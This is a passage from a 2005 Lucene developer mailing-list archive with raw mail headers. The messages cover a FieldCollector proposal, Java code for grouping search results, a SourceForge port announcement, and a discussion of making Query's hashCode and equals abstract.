10:58:40 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j29IwbZG017877 for <[email protected]>; Wed, 9 Mar 2005 19:58:37 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j29Iwb6q017875; Wed, 9 Mar 2005 19:58:37 +0100 Date: Wed, 9 Mar 2005 19:58:37 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33884] - [PATCH] add term index interval accessors X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33884>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33884 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |FIXED ------- Additional Comments From [email protected] 2005-03-09 19:58 ------- This patch has been applied. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 20:59:08 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86598 invoked from network); 9 Mar 2005 20:59:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 20:59:06 -0000 Received: (qmail 84845 invoked by uid 500); 9 Mar 2005 20:59:03 -0000 Delivered-To: [email protected] Received: (qmail 84795 invoked by uid 500); 9 Mar 2005 20:59:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84782 invoked by uid 99); 9 Mar 2005 20:59:03 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from pollock.hmdnsgroup.com (HELO pollock.hmdnsgroup.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 12:59:02 -0800 Received: from m5c6736d0.tmodns.net ([161.129.204.104]) by pollock.hmdnsgroup.com with esmtpa (Exim 4.44) id 1D98Gg-0003LO-Ds for [email protected]; Wed, 09 Mar 2005 15:59:00 -0500 Message-ID: <[email protected]> Date: Wed, 09 Mar 2005 15:58:46 -0500 From: Barry Hawkins <[email protected]> Organization: All Things Computed User-Agent: Debian Thunderbird 1.0 (X11/20050117) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Java Developers <[email protected]> Subject: Possible change to SVN repository link on Lucene main page X-Enigmail-Version: 161.129.204.104 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-HMDNSGroup-MailScanner-Information: Please contact the ISP for more information X-HMDNSGroup-MailScanner: Found to be clean X-MailScanner-From: [email protected] X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - pollock.hmdnsgroup.com X-AntiAbuse: Original Domain - lucene.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - alltc.com X-Source: X-Source-Args: X-Source-Dir: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Guys, ~ I noticed that there is a view-cvs.cgi script at the base of svn.apache.org, and that you can get a more useful view of the Lucene repository by using a viewcvs link[0] rather than the raw repository link[1] that is used on the main page[2] now. [0] - http://svn.apache.org/viewcvs.cgi/lucene [1] - http://svn.apache.org/repos/asf/lucene [2] - http://lucene.apache.org/java/docs/index.html Regards, - -- Barry Hawkins All Things Computed site: www.alltc.com weblog: www.yepthatsme.com Registered Linux User #368650 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (GNU/Linux) iD8DBQFCL2OG7bZ6kUftWZwRAk0UAKCPMjEhgEKDTlNPCEaPNMliCZ8V9gCgwL9f 5WXNWXqlMhHsfhhEMpBtT10= =6/tH -----END PGP SIGNATURE----- --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 00:57:30 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81384 invoked from network); 10 Mar 2005 00:57:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 00:57:29 -0000 Received: (qmail 53097 invoked by uid 500); 10 Mar 2005 00:57:27 -0000 Delivered-To: [email protected] Received: (qmail 53067 invoked by uid 500); 10 Mar 2005 00:57:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53053 invoked by uid 99); 10 Mar 2005 00:57:27 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 16:57:26 -0800 Received: by rproxy.gmail.com with SMTP id i8so384048rne for <[email protected]>; Wed, 09 Mar 2005 16:57:24 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=mgODFCwgWxLzkrgRr/MIU4KgfjROKlq3bWt+uZwjWfFbWRsE8cPwbahZOLCHqwdMdF2g4s+NnolfomCsrnoCD/OEnDJ7KWdufYbk+XUHyoLlbrMHBHgg3iVuUGemcbQJSe/cQgjLaGjC+kC88KIWmBhK+3gm4XM45XM6Gf6//DA= Received: by 161.129.204.104 with SMTP id m36mr1375621rnb; Wed, 09 Mar 2005 16:57:24 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 9 Mar 2005 16:57:24 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 9 Mar 2005 18:57:24 -0600 From: Chris Lamprecht <[email protected]> Reply-To: Chris Lamprecht <[email protected]> To: [email protected] Subject: Proposed Lucene modification - FieldCollector Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I've been reading the recent discussion in lucene-user about selective/lazy field retrieval and I'd like to propose an idea for a modification to lucene, and get some input. First let me illustrate some common use cases to justify this modification. It seems like a common requirement is to collect a count of how many times a certain value appears in a certain field (or set of fields), and then display the resulting "Top 10" most popular field values. A concrete example might be, user searches for "vertebrate" and the top 4 values for some field may be "Canine (10), Feline (7), Primate (4), Horse (2)". Another example is in Google Desktop search - when I do a search, the header bar shows me how many results of each type were a match: "3,819 emails - 1,450 files - 2,206 web history - 0 chats". One could imagine doing this in Lucene using a field "doctype" with tag values such as "email", "file", "web", "chat", etc, and keeping counts. The problem is a performance issue. To get complete statistics like above, you currently have to iterate through the result set and pull each Document from the Hits. If you don't need exact stats or if you only need the rankings (and not the counts), then you may be able to just iterate through the first few hundred results, but even this has a significant performance hit. So my idea is to add something similar to the HitCollector. The abstract class might be something like: public abstract class FieldCollector { protected String fieldName; public FieldCollector(String name) { this.fieldName = name; } /** Returns the field name, so the Searcher knows which fields to pull */ public String name() { return name; } /** * Called once for every non-zero scoring document, * for the set of field names requested in the call to IndexSearcher.search(). * Note: fieldValue can be null if this document does not contain this field */ public abstract void collect(int doc, float score, String fieldName, String fieldValue); } Then the call to searcher.search() might look something like this: searcher.search(query, new FieldCollector("doctype") { public void collect(int doc, float score, String name, String value) { // example usage: keep a tally of how many times each field occurred if (value != null) incrementFieldCount(name, value); // defined elsewhere } }); This would require modifying Lucene to pull only these selected Document fields and call this collect() method during search. I know this will slow the search down -- the question is, how much? Since IndexReader reads fields sequentially, one could index Documents so that the small, commonly "collected" fields come first, and the big fields (that aren't ever "collected") come last. Another option is to allow the client code to put a limit on how many times the searcher calls collect(), e.g., only call it for the first 1000 results, or with probability 1/100. Or let the collect() method return a boolean to signal whether to continue collecting, etc. Comments? I actually need something like this for a project I'm working on, and I'd be happy to implement it. -Chris PS-Let me know if I should post this to the lucene-user list instead --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 07:59:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67686 invoked from network); 10 Mar 2005 07:59:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 07:59:08 -0000 Received: (qmail 73385 invoked by uid 500); 10 Mar 2005 07:59:06 -0000 Delivered-To: [email protected] Received: (qmail 73345 invoked by uid 500); 10 Mar 2005 07:59:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73329 invoked by uid 99); 10 Mar 2005 07:59:04 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy includes SPF [email protected]) Received: from web26003.mail.ukl.yahoo.com (HELO web26003.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Wed, 09 Mar 2005 23:59:02 -0800 Received: (qmail 40929 invoked by uid 60001); 10 Mar 2005 07:58:59 -0000 Message-ID: <[email protected]> Received: from [161.129.204.104] by web26003.mail.ukl.yahoo.com via HTTP; Thu, 10 Mar 2005 07:58:59 GMT Date: Thu, 10 Mar 2005 07:58:59 +0000 (GMT) From: mark harwood <[email protected]> Subject: Re: Proposed Lucene modification - FieldCollector To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N >>To get complete statistics like >>above, you currently have to iterate through the result >> set and pull each Document from the Hits. Not necessarily true. You can use TermVectors or an indexed field eg "doctype" to derive this stuff without stored fields. Here's an example of how I've done it before using indexed fields. I've been meaning to tidy this up and contribute this as it looks like it could be generally useful. The "GroupKeyFactory" is an abstraction which allows you to process a term before using it for totalling eg to group dates on a year rather than a full date. protected GroupTotal[] groupByIndexTokens(GroupQueryParams params)throws ParseException, IOException { final HashMap totals = new HashMap(); final GroupingKeyFactory groupKeyFactory = params.getGroupKeyFactory(); String groupFieldName = params.getGroupFieldName(); //TODO IndexSearcher should be passed in and resused? IndexSearcher searcher = new IndexSearcher(reader); float minScore = params.getMinDocScore(); final float scores[] = new float[reader.numDocs()]; String queryString=params.getQuery(); if((queryString==null)||(queryString.trim().length()==0)) { //TODO if query is null then we could optimise counting by just taking docFreq // from TermEnum and avoding use of TermDocs? Arrays.fill(scores,1); } else { Query query = null; query = QueryParser.parse(params.getQuery(), "contents", analyzer); searcher.search(query, null, new HitCollector() { public void collect(int docID, float score) { scores[docID] = score; } }); } TermEnum te = reader.terms(new Term(groupFieldName, "")); Term term = te.term(); while (term!=null) { if (term.field().equals(groupFieldName)) { TermDocs termDocs = reader.termDocs(term); GroupTotal groupTotal = null; boolean continueThisTerm = true; while ((continueThisTerm) && (termDocs.next())) { int docID = termDocs.doc(); float docScore = scores[docID]; //TODO include logic to test queryParams.includeZeroScore groups if ((docScore > 0) && (docScore > minScore)) // if(docScore>minScore) { if (groupTotal == null) { //look up the group key and initialize String termText = term.text(); Object key = termText; if (groupKeyFactory != null) { key = groupKeyFactory.getGroupingKey(termText,docID); if (key == null) { continueThisTerm = false; continue; } } groupTotal = (GroupTotal) totals.get(key); if (groupTotal == null) { //no totals exist yet, create new one. groupTotal = new GroupTotal(params .getReturnDocIdsWithGroups()); groupTotal.setGroupKey(key); totals.put(key, groupTotal); groupTotal.addToTotalDocFreq(te.docFreq()); } } groupTotal.addQueryMatchDoc(docID, scores[docID]); } } } else { break; } if(te.next()) { term=te.term(); } else { break; } } Collection result = totals.values(); GroupTotal[] results = (GroupTotal[]) result.toArray(new GroupTotal[result.size()]); return results; } Send instant messages to your online friends http://uk.messenger.yahoo.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 08:03:03 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72624 invoked from network); 10 Mar 2005 08:03:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 08:03:03 -0000 Received: (qmail 86071 invoked by uid 500); 10 Mar 2005 08:02:59 -0000 Delivered-To: [email protected] Received: (qmail 86039 invoked by uid 500); 10 Mar 2005 08:02:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86025 invoked by uid 500); 10 Mar 2005 08:02:59 -0000 Delivered-To: [email protected] Received: (qmail 86014 invoked by uid 99); 10 Mar 2005 08:02:59 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy includes SPF [email protected]) Received: from web26010.mail.ukl.yahoo.com (HELO web26010.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Thu, 10 Mar 2005 00:02:58 -0800 Received: (qmail 60071 invoked by uid 60001); 10 Mar 2005 07:36:15 -0000 Message-ID: <[email protected]> Received: from [161.129.204.104] by web26010.mail.ukl.yahoo.com via HTTP; Thu, 10 Mar 2005 07:36:15 GMT Date: Thu, 10 Mar 2005 07:36:15 +0000 (GMT) From: mark harwood <[email protected]> Subject: Re: Proposed Lucene modification - FieldCollector To: lucenedev <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N >>To get complete statistics like >>above, you currently have to iterate through the result >> set and pull each Document from the Hits. Not necessarily true. You can use TermVectors or an indexed field eg "doctype" to derive this stuff without stored fields. Here's an example of how I've done it before using indexed fields. I've been meaning to tidy this up and contribute this as it looks like it could be generally useful. The "GroupKeyFactory" is an abstraction which allows you to process a term before using it for totalling eg to group dates on a year rather than a full date. protected GroupTotal[] groupByIndexTokens(GroupQueryParams params)throws ParseException, IOException { final HashMap totals = new HashMap(); final GroupingKeyFactory groupKeyFactory = params.getGroupKeyFactory(); String groupFieldName = params.getGroupFieldName(); //TODO IndexSearcher should be passed in and resused? IndexSearcher searcher = new IndexSearcher(reader); float minScore = params.getMinDocScore(); final float scores[] = new float[reader.numDocs()]; String queryString=params.getQuery(); if((queryString==null)||(queryString.trim().length()==0)) { //TODO if query is null then we could optimise counting by just taking docFreq // from TermEnum and avoding use of TermDocs? Arrays.fill(scores,1); } else { Query query = null; query = QueryParser.parse(params.getQuery(), "contents", analyzer); searcher.search(query, null, new HitCollector() { public void collect(int docID, float score) { scores[docID] = score; } }); } TermEnum te = reader.terms(new Term(groupFieldName, "")); Term term = te.term(); while (term!=null) { if (term.field().equals(groupFieldName)) { TermDocs termDocs = reader.termDocs(term); GroupTotal groupTotal = null; boolean continueThisTerm = true; while ((continueThisTerm) && (termDocs.next())) { int docID = termDocs.doc(); float docScore = scores[docID]; //TODO include logic to test queryParams.includeZeroScore groups if ((docScore > 0) && (docScore > minScore)) // if(docScore>minScore) { if (groupTotal == null) { //look up the group key and initialize String termText = term.text(); Object key = termText; if (groupKeyFactory != null) { key = groupKeyFactory.getGroupingKey(termText,docID); if (key == null) { continueThisTerm = false; continue; } } groupTotal = (GroupTotal) totals.get(key); if (groupTotal == null) { //no totals exist yet, create new one. groupTotal = new GroupTotal(params .getReturnDocIdsWithGroups()); groupTotal.setGroupKey(key); totals.put(key, groupTotal); groupTotal.addToTotalDocFreq(te.docFreq()); } } groupTotal.addQueryMatchDoc(docID, scores[docID]); } } } else { break; } if(te.next()) { term=te.term(); } else { break; } } Collection result = totals.values(); GroupTotal[] results = (GroupTotal[]) result.toArray(new GroupTotal[result.size()]); return results; } Send instant messages to your online friends http://uk.messenger.yahoo.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 14:51:35 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78109 invoked from network); 10 Mar 2005 14:51:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 14:51:34 -0000 Received: (qmail 17292 invoked by uid 500); 10 Mar 2005 14:51:32 -0000 Delivered-To: [email protected] Received: (qmail 17251 invoked by uid 500); 10 Mar 2005 14:51:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17238 invoked by uid 500); 10 Mar 2005 14:51:31 -0000 Delivered-To: [email protected] Received: (qmail 17235 invoked by uid 99); 10 Mar 2005 14:51:31 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 10 Mar 2005 06:51:30 -0800 Received: by rproxy.gmail.com with SMTP id a41so523875rng for <[email protected]>; Thu, 10 Mar 2005 06:51:27 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=EFokQQowmibTTylw7wg+Z3kliWY0UqziZWdfhhvFxtaNR5fJZmhgsNCj5PZg2htP1l3b6MlCHAXyjpfshpHtYQ5QBVjBufl/qNaHF0QdSuTtI3hPxFG6rXr8VtrNJegJh5v0WBl113ImCsX+Wp93BWXHTAF03fWUiwhOeqoUns8= Received: by 161.129.204.104 with SMTP id x43mr1806120rnc; Thu, 10 Mar 2005 06:51:27 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 10 Mar 2005 06:51:26 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 10 Mar 2005 09:51:26 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: Lucene Developers List <[email protected]> Subject: MUTIS on CVS! Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N After a week triying to get the CVS thing, yesterday I was able to commit to CVS. The url is http://cvs.sourceforge.net/viewcvs.py/mutis/Mutis/. The code in CVS is more new than the actual release (ALPHA 1) and I'm working fast to complete the port. In http://mutis.sourceforge.net/ I maintain a page showing the actual progress in the project (if you can help in it ;).... ) By the way, Sourceforge, not, we the users of Sourceforge need Subversion support! Also, I find that stadistics are not accurate... --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 16:20:30 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30211 invoked from network); 10 Mar 2005 16:20:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 16:20:29 -0000 Received: (qmail 90949 invoked by uid 500); 10 Mar 2005 16:20:27 -0000 Delivered-To: [email protected] Received: (qmail 90910 invoked by uid 500); 10 Mar 2005 16:20:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90893 invoked by uid 99); 10 Mar 2005 16:20:27 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from p15112568.pureserver.info (HELO p15112568.pureserver.info) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 10 Mar 2005 08:20:25 -0800 Received: from [161.129.204.104] (ppp-82-135-8-69.mnet-online.de [161.129.204.104]) (using TLSv1 with cipher RC4-MD5 (128/128 bits)) (No client certificate requested) by p15112568.pureserver.info (Postfix) with ESMTP id 650CC14010F for <[email protected]>; Thu, 10 Mar 2005 17:20:23 +0100 (CET) Message-ID: <[email protected]> Date: Thu, 10 Mar 2005 17:20:15 +0100 From: Bernhard Messer <[email protected]> User-Agent: Mozilla Thunderbird 0.8 (X11/20040913) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Developer <[email protected]> Subject: subclasses of abstract Query class are not implementing all methods Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hi, I would like to cache query objects in a hash map. My implementation failed, because not all of the Query classes are implementing the necessary method: "public int hashCode()". The same counts for the "public boolean equals (Object o)", "public String toString(String fieldName)" and "public String toString()". To force all subclasses of Query to implement this 4 methods, i would like to make them abstract within the base class and implement the missing ones in the subclasses. So in Query class itself, it would look: public abstract String toString(String field); public abstract String toString(); public abstract int hashCode(); public abstract boolean equals(Object o); I think this would make the API cleaner and more usable. Thoughts ??? Bernhard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 18:48:29 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18684 invoked from network); 10 Mar 2005 18:48:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 18:48:28 -0000 Received: (qmail 82897 invoked by uid 500); 10 Mar 2005 18:48:27 -0000 Delivered-To: [email protected] Received: (qmail 82859 invoked by uid 500); 10 Mar 2005 18:48:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82844 invoked by uid 99); 10 Mar 2005 18:48:26 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 10 Mar 2005 10:48:26 -0800 Received: by rproxy.gmail.com with SMTP id b11so648493rne for <[email protected]>; Thu, 10 Mar 2005 10:48:21 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=Y67u1mDE6H65QEjX/KRTst894r+rb/5g+oa3qjuZ6tBUqBuKXWgN2zxW7npYwHHErNbJ3cVdJWbs3MXRz2sySrfyn79hLqsTyGbLQfavp037rXT1amf34mdFeeMDW+CtMLt4F0HQPurGqhV+DCvGuPKxNxnGIUSU9qfS6YGudqE= Received: by 161.129.204.104 with SMTP id h39mr1092989rna; Thu, 10 Mar 2005 10:48:21 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 10 Mar 2005 10:48:21 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 10 Mar 2005 13:48:21 -0500 From: Yonik Seeley <[email protected]> Reply-To: Yonik Seeley <[email protected]> To: [email protected] Subject: Re: subclasses of abstract Query class are not implementing all methods In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Great idea. I am also planning on doing some caching based on query objects, and I hadn't realized that these weren't implemented. In the meantime, I guess I can cache an Object that contains a Query, and traverse the query tree myself to implement missing .hashCode() or .equals() functionality. -Yonik On Thu, 10 Mar 2005 17:20:15 +0100, Bernhard Messer <[email protected]> wrote: > Hi, > > I would like to cache query objects in a hash map. My implementation > failed, because not all of the Query classes are implementing the > necessary method: "public int hashCode()". The same counts for the > "public boolean equals (Object o)", "public String toString(String > fieldName)" and "public String toString()". To force all subclasses of > Query to implement this 4 methods, i would like to make them abstract > within the base class and implement the missing ones in the subclasses. > So in Query class itself, it would look: > > public abstract String toString(String field); > public abstract String toString(); > public abstract int hashCode(); > public abstract boolean equals(Object o); > > I think this would make the API cleaner and more usable. > > Thoughts ??? > > Bernhard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 10 20:40:21 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95077 invoked from network); 10 Mar 2005 20:40:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Mar 2005 20:40:20 -0000 Received: (qmail 82551 invoked by uid 500); 10 Mar 2005 20:40:19 -0000 Delivered-To: [email protected] Received: (qmail 82146 invoked by uid 500); 10 Mar 2005 20:40:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82133 invoked by uid 99); 10 Mar 2005 20:40:18 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from server1.hostmon.com (HELO server1.hostmon.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 10 Mar 2005 12:40:17 -0800 Received: (qmail 478 invoked by uid 532); 10 Mar 2005 20:39:24 -0000 Received: from [email protected] by server1.hostmon.com by uid 0 with qmail-scanner-1.16 (spamassassin: 3.0.0. Clear:. Processed in 0.148771 secs); 10 Mar 2005 20:39:24 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 10 Mar 2005 20:39:23 -0000 Message-ID: <[email protected]> Date: Thu, 10 Mar 2005 12:40:47 -0800 From: David Spencer <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: subclasses of abstract Query class are not implementing all methods References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Bernhard Messer wrote: > Hi, > > I would like to cache query objects in a hash map. My implementation > failed, because not all of the Query classes are implementing the > necessary method: "public int hashCode()". The same counts for the > "public boolean equals (Object o)", "public String toString(String > fieldName)" and "public String toString()". To force all subclasses of > Query to implement this 4 methods, i would like to make them abstract > within the base class and implement the missing ones in the subclasses. > So in Query class itself, it would look: > > public abstract String toString(String field); > public abstract String toString(); What's the point of toString() w/o an argument - this doesn't really matter for Query does it? > public abstract int hashCode(); > public abstract boolean equals(Object o); > > I think this would make the API cleaner and more usable. > > Thoughts ??? > > Bernhard > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 11 03:26:58 